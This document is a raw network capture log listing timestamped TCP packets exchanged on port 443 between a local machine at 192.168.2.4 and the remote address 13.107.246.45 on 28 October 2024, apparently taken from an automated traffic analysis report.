                                                                            Oct 28, 2024 09:37:24.644218922 CET4434992513.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:24.645431042 CET49925443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:24.645467043 CET4434992513.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:24.645873070 CET49925443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:24.645884037 CET4434992513.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:24.652014017 CET4434992413.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:24.652450085 CET49924443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:24.652467012 CET4434992413.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:24.652828932 CET49924443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:24.652836084 CET4434992413.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:24.754503012 CET4434992713.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:24.754656076 CET4434992713.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:24.754738092 CET49927443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:24.754986048 CET49927443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:24.754986048 CET49927443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:24.755016088 CET4434992713.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:24.755037069 CET4434992713.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:24.758078098 CET49929443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:24.758160114 CET4434992913.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:24.758608103 CET49929443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:24.758716106 CET49929443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:24.758745909 CET4434992913.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:24.761975050 CET4434992813.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:24.762049913 CET4434992813.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:24.762123108 CET49928443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:24.762221098 CET49928443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:24.762221098 CET49928443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:24.762221098 CET49928443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:24.762267113 CET4434992813.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:24.762298107 CET4434992813.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:24.763303995 CET4434992613.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:24.763360023 CET4434992613.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:24.763411045 CET4434992613.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:24.763434887 CET49926443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:24.763484001 CET49926443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:24.763644934 CET49926443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:24.763644934 CET49926443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:24.763664007 CET4434992613.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:24.763675928 CET4434992613.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:24.764657974 CET49930443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:24.764739037 CET4434993013.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:24.764997959 CET49930443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:24.764997959 CET49930443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:24.765156031 CET4434993013.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:24.766154051 CET49931443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:24.766235113 CET4434993113.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:24.766320944 CET49931443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:24.766666889 CET49931443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:24.766746044 CET4434993113.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:24.775794029 CET4434992513.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:24.775974035 CET4434992513.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:24.776056051 CET49925443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:24.776202917 CET49925443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:24.776215076 CET4434992513.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:24.776230097 CET49925443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:24.776236057 CET4434992513.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:24.778830051 CET49932443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:24.778858900 CET4434993213.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:24.778976917 CET49932443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:24.779170990 CET49932443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:24.779186964 CET4434993213.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:24.785090923 CET4434992413.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:24.785155058 CET4434992413.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:24.785212994 CET49924443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:24.785459042 CET49924443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:24.785459042 CET49924443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:24.785466909 CET4434992413.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:24.785475969 CET4434992413.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:24.787556887 CET49933443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:24.787647963 CET4434993313.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:24.787920952 CET49933443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:24.788068056 CET49933443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:24.788100004 CET4434993313.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:25.500202894 CET4434992913.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:25.500747919 CET4434993013.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:25.500798941 CET49929443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:25.500859022 CET4434992913.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:25.501085043 CET49929443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:25.501090050 CET4434993113.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:25.501101017 CET4434992913.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:25.501262903 CET49930443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:25.501322031 CET4434993013.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:25.501590014 CET49930443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:25.501604080 CET4434993013.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:25.501646042 CET49931443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:25.501660109 CET4434993113.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:25.502248049 CET49931443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:25.502259016 CET4434993113.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:25.516201973 CET4434993213.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:25.516886950 CET49932443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:25.516886950 CET49932443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:25.516908884 CET4434993213.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:25.516916037 CET4434993213.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:25.526540041 CET4434993313.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:25.527357101 CET49933443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:25.527357101 CET49933443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:25.527436018 CET4434993313.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:25.527467966 CET4434993313.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:25.630667925 CET4434993013.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:25.630706072 CET4434993013.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:25.630753994 CET4434993013.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:25.630805016 CET49930443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:25.630832911 CET4434992913.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:25.630878925 CET49930443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:25.630983114 CET4434992913.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:25.631117105 CET49929443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:25.631191969 CET49929443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:25.631191969 CET49929443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:25.631206036 CET49930443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:25.631206989 CET49930443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:25.631237984 CET4434992913.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:25.631268024 CET4434992913.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:25.631282091 CET4434993013.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:25.631295919 CET4434993013.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:25.631588936 CET4434993113.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:25.631740093 CET4434993113.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:25.631927967 CET49931443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:25.632134914 CET49931443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:25.632147074 CET4434993113.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:25.632180929 CET49931443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:25.632193089 CET4434993113.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:25.634753942 CET49934443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:25.634776115 CET4434993413.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:25.634773016 CET49935443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:25.634880066 CET4434993513.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:25.635035992 CET49934443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:25.635046959 CET49935443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:25.635220051 CET49934443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:25.635224104 CET4434993413.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:25.635227919 CET49935443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:25.635247946 CET4434993513.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:25.636117935 CET49936443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:25.636198997 CET4434993613.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:25.636574984 CET49936443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:25.636574984 CET49936443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:25.636699915 CET4434993613.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:25.647109032 CET4434993213.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:25.647248983 CET4434993213.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:25.647605896 CET49932443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:25.647605896 CET49932443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:25.647743940 CET49932443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:25.647751093 CET4434993213.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:25.650098085 CET49937443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:25.650180101 CET4434993713.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:25.650464058 CET49937443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:25.650464058 CET49937443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:25.650641918 CET4434993713.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:25.656291008 CET4434993313.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:25.656450033 CET4434993313.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:25.656620026 CET49933443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:25.656620979 CET49933443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:25.656620979 CET49933443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:25.658689022 CET49938443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:25.658770084 CET4434993813.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:25.659117937 CET49938443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:25.660917044 CET49938443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:25.660964012 CET4434993813.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:25.971508026 CET49933443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:25.971569061 CET4434993313.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:26.376028061 CET4434993513.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:26.376482964 CET49935443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:26.376544952 CET4434993513.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:26.377027035 CET49935443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:26.377079010 CET4434993513.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:26.379075050 CET4434993413.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:26.379395962 CET49934443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:26.379425049 CET4434993413.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:26.379754066 CET49934443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:26.379760981 CET4434993413.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:26.381335020 CET4434993613.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:26.381650925 CET49936443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:26.381726980 CET4434993613.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:26.381937981 CET49936443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:26.381978035 CET4434993613.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:26.396331072 CET4434993713.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:26.396637917 CET49937443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:26.396667004 CET4434993713.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:26.396959066 CET49937443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:26.396966934 CET4434993713.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:26.437414885 CET4434993813.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:26.437743902 CET49938443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:26.437803030 CET4434993813.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:26.438056946 CET49938443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:26.438071012 CET4434993813.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:26.508407116 CET4434993513.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:26.508603096 CET4434993513.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:26.508690119 CET49935443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:26.508768082 CET49935443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:26.508768082 CET49935443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:26.508810043 CET4434993513.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:26.508915901 CET4434993513.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:26.511182070 CET49939443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:26.511265993 CET4434993913.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:26.511604071 CET4434993613.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:26.511622906 CET49939443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:26.511622906 CET49939443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:26.511630058 CET4434993413.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:26.511662006 CET4434993413.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:26.511678934 CET4434993613.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:26.511708021 CET4434993413.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:26.511730909 CET49934443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:26.511754990 CET4434993913.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:26.511758089 CET49934443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:26.511782885 CET4434993613.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:26.511810064 CET49934443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:26.511810064 CET49934443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:26.511827946 CET4434993413.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:26.511840105 CET4434993413.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:26.511894941 CET49936443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:26.511894941 CET49936443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:26.511981964 CET49936443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:26.511981964 CET49936443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:26.512021065 CET4434993613.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:26.512056112 CET4434993613.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:26.514002085 CET49941443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:26.514025927 CET4434994113.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:26.514030933 CET49940443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:26.514080048 CET49941443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:26.514112949 CET4434994013.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:26.514204979 CET49941443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:26.514214993 CET4434994113.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:26.514235973 CET49940443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:26.514317989 CET49940443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:26.514342070 CET4434994013.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:26.528609037 CET4434993713.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:26.528758049 CET4434993713.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:26.528983116 CET49937443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:26.528983116 CET49937443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:26.528984070 CET49937443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:26.530775070 CET49942443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:26.530886889 CET4434994213.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:26.531301022 CET49942443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:26.531301022 CET49942443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:26.531452894 CET4434994213.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:26.575172901 CET4434993813.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:26.575272083 CET4434993813.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:26.575352907 CET49938443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:26.575381994 CET4434993813.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:26.575407982 CET4434993813.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:26.575613976 CET49938443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:26.575613976 CET49938443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:26.575613976 CET49938443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:26.577151060 CET49943443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:26.577167988 CET4434994313.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:26.577225924 CET49943443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:26.577349901 CET49943443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:26.577370882 CET4434994313.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:26.833592892 CET49937443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:26.833652020 CET4434993713.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:26.878073931 CET49938443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:26.878102064 CET4434993813.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:27.242415905 CET4434993913.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:27.249810934 CET4434994013.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:27.250840902 CET49939443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:27.250897884 CET4434993913.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:27.251616001 CET49939443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:27.251629114 CET4434993913.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:27.252085924 CET4434994113.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:27.265058041 CET4434994213.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:27.267837048 CET49941443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:27.267863035 CET4434994113.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:27.268338919 CET49941443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:27.268347025 CET4434994113.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:27.278419018 CET49940443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:27.278501034 CET4434994013.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:27.278914928 CET49940443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:27.278965950 CET4434994013.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:27.280046940 CET49942443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:27.280103922 CET4434994213.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:27.280927896 CET49942443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:27.280978918 CET4434994213.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:27.315599918 CET4434994313.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:27.332242012 CET49943443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:27.332252026 CET4434994313.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:27.332756996 CET49943443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:27.332762003 CET4434994313.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:27.376790047 CET4434993913.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:27.376936913 CET4434993913.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:27.377099991 CET49939443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:27.394440889 CET4434994113.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:27.394593000 CET4434994113.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:27.394658089 CET49941443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:27.406330109 CET4434994213.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:27.406423092 CET4434994213.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:27.406527996 CET4434994213.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:27.406786919 CET49942443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:27.407176971 CET4434994013.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:27.407659054 CET4434994013.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:27.407805920 CET4434994013.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:27.407882929 CET49940443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:27.407949924 CET49940443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:27.426290035 CET49939443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:27.426290035 CET49939443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:27.426352978 CET4434993913.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:27.426398039 CET4434993913.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:27.427913904 CET49940443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:27.427915096 CET49940443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:27.427978039 CET4434994013.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:27.428013086 CET4434994013.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:27.429487944 CET49941443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:27.429510117 CET4434994113.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:27.429627895 CET49941443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:27.429636955 CET4434994113.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:27.431927919 CET49942443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:27.431927919 CET49942443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:27.431991100 CET4434994213.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:27.432045937 CET4434994213.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:27.504714966 CET49944443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:27.504797935 CET4434994413.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:27.505111933 CET49944443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:27.512818098 CET49945443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:27.512897015 CET4434994513.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:27.513058901 CET49945443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:27.516314983 CET49946443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:27.516395092 CET4434994613.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:27.516494036 CET49946443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:27.516664982 CET49944443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:27.516697884 CET4434994413.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:27.517525911 CET49945443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:27.517539978 CET4434994513.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:27.518673897 CET49947443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:27.518682003 CET4434994713.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:27.518752098 CET49947443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:27.518878937 CET49947443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:27.518882036 CET4434994713.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:27.532078028 CET49946443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:27.532145977 CET4434994613.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:27.658655882 CET4434994313.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:27.658792019 CET4434994313.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:27.658850908 CET49943443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:27.658875942 CET49943443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:27.658885956 CET4434994313.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:27.658895016 CET49943443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:27.658899069 CET4434994313.107.246.45192.168.2.4
                                                                            Oct 28, 2024 09:37:27.660617113 CET49948443192.168.2.413.107.246.45
                                                                            Oct 28, 2024 09:37:27.660680056 CET4434994813.107.246.45192.168.2.4
